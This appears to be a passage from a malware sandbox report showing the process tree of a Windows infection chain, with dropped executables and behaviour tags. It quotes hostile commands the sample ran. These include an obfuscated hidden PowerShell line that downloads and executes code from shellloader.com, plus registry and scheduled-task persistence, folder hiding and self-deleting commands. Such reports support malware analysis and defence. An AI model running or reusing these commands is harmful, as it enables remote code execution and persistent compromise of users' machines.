                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4648
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:5344
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "
                                                                                                                                          9⤵
                                                                                                                                            PID:6540
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exe
                                                                                                                                              HWI.exe
                                                                                                                                              10⤵
                                                                                                                                                PID:6944
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exe
                                                                                                                                                  HWI.exe
                                                                                                                                                  11⤵
                                                                                                                                                    PID:6988
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                                                                                                                                      12⤵
                                                                                                                                                        PID:4712
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                                                                                                                                          13⤵
                                                                                                                                                            PID:6440
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                                                                                                                              14⤵
                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                              PID:3560
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:5728
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
                                                                                                                                                                14⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:1824
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pcbooster\pcbooster.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\pcbooster\pcbooster.exe"
                                                                                                                                                                14⤵
                                                                                                                                                                  PID:7740
                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Wow_x64\cleandefers\ghjdkllk.vbs" /f=CREATE_NO_WINDOW install.cmd
                                                                                                                                                                    15⤵
                                                                                                                                                                      PID:8144
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Wow_x64\cleandefers\defend.bat" "
                                                                                                                                                                        16⤵
                                                                                                                                                                          PID:7828
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout 7
                                                                                                                                                                            17⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:5256
                                                                                                                                                                          • C:\Wow_x64\cleandefers\confss.exe
                                                                                                                                                                            "confss.exe" e -pdiuir87Fy2i3ih8rF4i8hisf9lc doom.rar
                                                                                                                                                                            17⤵
                                                                                                                                                                              PID:6340
                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                              timeout 6
                                                                                                                                                                              17⤵
                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                              PID:7552
                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Wow_x64\cleandefers\w1q.vbs"
                                                                                                                                                                              17⤵
                                                                                                                                                                                PID:5532
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Wow_x64\cleandefers\shellstart.bat" "
                                                                                                                                                                                  18⤵
                                                                                                                                                                                    PID:4752
                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                      attrib +s +h "C:\Wow_x64"
                                                                                                                                                                                      19⤵
                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                      PID:7604
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout 2
                                                                                                                                                                                      19⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:2716
                                                                                                                                                                                    • C:\Wow_x64\cleandefers\brokerclean.exe
                                                                                                                                                                                      brokerclean.exe /start
                                                                                                                                                                                      19⤵
                                                                                                                                                                                        PID:2980
                                                                                                                                                                                        • C:\Wow_x64\cleandefers\brokerclean.exe
                                                                                                                                                                                          brokerclean.exe /start
                                                                                                                                                                                          20⤵
                                                                                                                                                                                            PID:8036
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /f /im confss.exe
                                                                                                                                                                                          19⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:4272
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /f /im confss.exe
                                                                                                                                                                                          19⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:9084
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout 8
                                                                                                                                                                                      17⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:4656
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exe
                                                                                                                                                                        FoxyIDM62s.exe
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:7044
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:4404
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4948
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NUUJO.tmp\setup_2.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NUUJO.tmp\setup_2.tmp" /SL5="$10320,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:4544
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:5312
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-AFNQR.tmp\setup_2.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-AFNQR.tmp\setup_2.tmp" /SL5="$40296,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:5652
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-IRVLA.tmp\postback.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-IRVLA.tmp\postback.exe" ss1
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:6696
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      explorer.exe ss1
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:1268
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:5196
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:6756
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6ZSaUOrN9.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\6ZSaUOrN9.exe"
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:7908
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:7796
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\mvlkSGCxj.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\mvlkSGCxj.exe"
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:7600
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:5256
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:3652
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 804
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5056
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 840
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5264
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 892
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5524
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 956
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5712
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 816
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5860
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 932
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:6072
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 812
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5404
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:208
                                                                                                                                                                                          • C:\ProgramData\2673757.exe
                                                                                                                                                                                            "C:\ProgramData\2673757.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4120
                                                                                                                                                                                            • C:\ProgramData\1092116.exe
                                                                                                                                                                                              "C:\ProgramData\1092116.exe"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:5340
                                                                                                                                                                                              • C:\ProgramData\3548005.exe
                                                                                                                                                                                                "C:\ProgramData\3548005.exe"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:5868
                                                                                                                                                                                                • C:\ProgramData\4169324.exe
                                                                                                                                                                                                  "C:\ProgramData\4169324.exe"
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:5016
                                                                                                                                                                                                  • C:\ProgramData\5014185.exe
                                                                                                                                                                                                    "C:\ProgramData\5014185.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:4188
                                                                                                                                                                                                    • C:\ProgramData\6906834.exe
                                                                                                                                                                                                      "C:\ProgramData\6906834.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:5928
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:4064
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:5708
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:5424
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:5840
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4028
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu2102ff6cfe07c.exe
                                                                                                                                                                                                        Thu2102ff6cfe07c.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4080
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu214aaca5625.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3820
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu214aaca5625.exe
                                                                                                                                                                                                          Thu214aaca5625.exe
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:3752
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                        PID:1328
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu214ce31cede21.exe
                                                                                                                                                                                                          Thu214ce31cede21.exe
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                          PID:3236
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                            PID:2036
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im Thu214ce31cede21.exe /f
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:5364
                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                              PID:6464
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-628D4.tmp\Thu214aaca5625.tmp
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-628D4.tmp\Thu214aaca5625.tmp" /SL5="$40064,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCDB5DB84\Thu214aaca5625.exe"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:4320
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-ATF6J.tmp\46807GHF____.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-ATF6J.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5032
                                                                                                                                                                                                    • C:\Program Files\Windows Defender Advanced Threat Protection\KBZAFBOGOA\ultramediaburner.exe
                                                                                                                                                                                                      "C:\Program Files\Windows Defender Advanced Threat Protection\KBZAFBOGOA\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4904
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7I34P.tmp\ultramediaburner.tmp
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7I34P.tmp\ultramediaburner.tmp" /SL5="$50370,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\KBZAFBOGOA\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:6324
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\49-1acb9-aaf-b77be-268bcb034e254\Kekylodebo.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\49-1acb9-aaf-b77be-268bcb034e254\Kekylodebo.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:6104
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\26-19ee7-fc5-bf7a5-7133583e0e353\Fiqyxyfota.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\26-19ee7-fc5-bf7a5-7133583e0e353\Fiqyxyfota.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6212
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wzfuxsum.bru\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wzfuxsum.bru\GcleanerEU.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wzfuxsum.bru\GcleanerEU.exe /eufive
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:5556
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2hirwv0v.t4m\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:5292
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2hirwv0v.t4m\installer.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2hirwv0v.t4m\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:7048
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2hirwv0v.t4m\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2hirwv0v.t4m\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630972362 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:8052
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0lajx4b.kil\anyname.exe & exit
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:6456
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\m0lajx4b.kil\anyname.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\m0lajx4b.kil\anyname.exe
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otfcbora.5xu\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:6628
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\otfcbora.5xu\gcleaner.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\otfcbora.5xu\gcleaner.exe /mixfive
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:7056
                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                              PID:6124
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5956
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3364
                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  PID:3584
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:6560
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6900
                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:7212
                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:7280
                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding C31D2B38A6E4BA8D85B18C42D6D0143E C
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:7804
                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 3D41C312239263DD7E4AC7AC261E5150
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4980
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                  PID:7632
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              PID:7976
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:8048
                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:3248
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6832
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5080
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:7904
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2AC5.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2AC5.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6280.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\6280.exe
                                                                                                                                                                                                                                                          1⤵
